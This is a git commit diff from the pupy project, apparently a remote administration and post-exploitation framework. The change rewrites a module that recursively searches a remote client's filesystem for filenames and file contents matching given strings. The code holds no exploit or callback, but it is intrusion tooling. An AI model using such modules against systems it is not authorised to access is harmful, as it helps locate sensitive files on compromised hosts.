Merge branch 'search' of https://github.com/AlessandroZ/pupy into dev

This commit is contained in:
n1nj4sec 2016-10-25 11:30:06 +02:00
commit 32f739159f
2 changed files with 92 additions and 45 deletions

View File

@ -1,5 +1,7 @@
# -*- coding: UTF8 -*- # -*- coding: UTF8 -*-
from pupylib.PupyModule import * from pupylib.PupyModule import *
import os
from pupylib.utils.term import colorize
__class_name__="SearchModule" __class_name__="SearchModule"
@ -9,18 +11,30 @@ class SearchModule(PupyModule):
daemon=True daemon=True
def init_argparse(self): def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="search", description=self.__doc__) self.arg_parser = PupyArgumentParser(prog="search", description=self.__doc__)
self.arg_parser.add_argument('path', help='path') self.arg_parser.add_argument('--path', default='.', help='root path to start (default: current path)')
self.arg_parser.add_argument('-e','--extensions',metavar='ext1,ext2,...', help='limit to some extensions') self.arg_parser.add_argument('-e','--extensions',metavar='ext1,ext2,...', default= '', help='limit to some extensions')
self.arg_parser.add_argument('strings', nargs='+', metavar='string', help='strings to search') self.arg_parser.add_argument('strings', nargs='+', metavar='string', help='strings to search')
self.arg_parser.add_argument('-m','--max-size', type=int, default=None, help='max file size') self.arg_parser.add_argument('-m','--max-size', type=int, default=20000000, help='max file size (default 20 Mo)')
self.arg_parser.add_argument('--content', action='store_true', help='check inside files (such as grep)')
def run(self, args): def run(self, args):
self.client.load_package("pupyutils.search", force=True) self.client.load_package("pupyutils.search", force=True)
exts=[] self.client.load_package("scandir")
if args.extensions:
exts=args.extensions.split(',')
self.info("searching strings %s in %s ..."%(args.strings, args.path))
for res in self.client.conn.modules['pupyutils.search'].search_path(args.path, args.strings, files_extensions=exts, max_size=args.max_size):
self.success("%s:%s > %s"%(res[0],res[1],res[2]))
self.info("search finished !")
if args.extensions:
args.extensions = tuple(f.strip() for f in args.extensions.split(','))
# if not extension is provided for find commad, try to extract it to gain time during the research
elif not args.content:
args.extensions = tuple(os.path.splitext(s)[1].strip() for s in args.strings)
search_str = [s.lower() for s in args.strings]
s = self.client.conn.modules['pupyutils.search'].Search(files_extensions=args.extensions, max_size=args.max_size, check_content=args.content, root_path=args.path, search_str=search_str)
self.info("searching strings %s in %s ..."%(args.strings, args.path))
for res in s.run():
# add color
for s in search_str:
if s in res:
res = res.replace(s, colorize(s,"green"))
self.success("%s" % res)
self.info("search finished !")

View File

@ -1,42 +1,75 @@
#!/usr/bin/env python #!/usr/bin/env python
# -*- coding: UTF8 -*- # -*- coding: utf-8 -*-
from scandir import scandir, walk
import time
import os import os
import os.path
import re import re
import sys
def search_file(path, search_strings): class Search():
buf=b"" def __init__(self, files_extensions='', max_size=20000000, check_content=False, root_path='.', search_str=[]):
line_nb=0 # By default max size is 20 Mo
try: self.max_size = max_size
with open(path, 'rb') as f: self.files_extensions = files_extensions
for line in f: self.check_content = check_content
line=line.lower() if root_path == '.':
for s in search_strings: self.root_path = os.getcwd()
start=0 else:
while True: self.root_path = root_path
i=line.find(s.lower(), start) self.search_str = search_str
if i==-1:
break
start=i+1
yield (line_nb+1, line[i:i+50].strip())
line_nb+=1
except Exception:
pass
def search_string(self, path, search_str):
buffer_size = 4096
buffer = None
try:
with open(path, 'rb') as f:
while True:
buffer = f.read(buffer_size)
if buffer:
for string in search_str:
# no case sensitive on regex
indexes = [m.start() for m in re.finditer(string, buffer, flags=re.IGNORECASE)]
for i in indexes:
# return the entire line
yield buffer[i:].strip().split('\n')[0]
else:
break
except:
pass
def search_path(path, search_strings, files_extensions=None, max_size=None): def scanwalk(self, path, followlinks=False):
""" search recursively for a string in all files in the path """ ''' lists of DirEntries instead of lists of strings '''
if not files_extensions: dirs, nondirs = [], []
files_extensions=None try:
if files_extensions is not None: for entry in scandir(path):
files_extensions=tuple(files_extensions) if entry.is_dir(follow_symlinks=followlinks):
for root, dirs, files in os.walk(path): dirs.append(entry)
for f in files: else:
if files_extensions is None or f.lower().endswith(files_extensions): if self.max_size > entry.stat(follow_symlinks=False).st_size:
if max_size is None or os.path.getsize(os.path.join(root,f))<max_size: if entry.name.endswith(self.files_extensions):
for res in search_file(os.path.join(root,f),search_strings): nondirs.append(entry)
yield (os.path.join(root,f), res[0], res[1]) yield path, dirs, nondirs
# try / except used for permission denied
except:
pass
if __name__=="__main__": for dir in dirs:
import sys for res in self.scanwalk(dir.path, followlinks=followlinks):
search_path(sys.argv[1],[sys.argv[2]]) yield res
def run(self):
for root, dirs, files in self.scanwalk(self.root_path):
for f in files:
# such as find command
for s in self.search_str:
if f.name.lower().find(s) != -1:
yield 'File: %s\n\n' % os.path.join(root, f.name)
# such as grep command
if self.check_content:
for res in self.search_string(os.path.join(root, f.name), self.search_str):
try:
res = res.encode('utf-8')
yield 'File: %s > %s\n\n' % (os.path.join(root, f.name), res)
except:
pass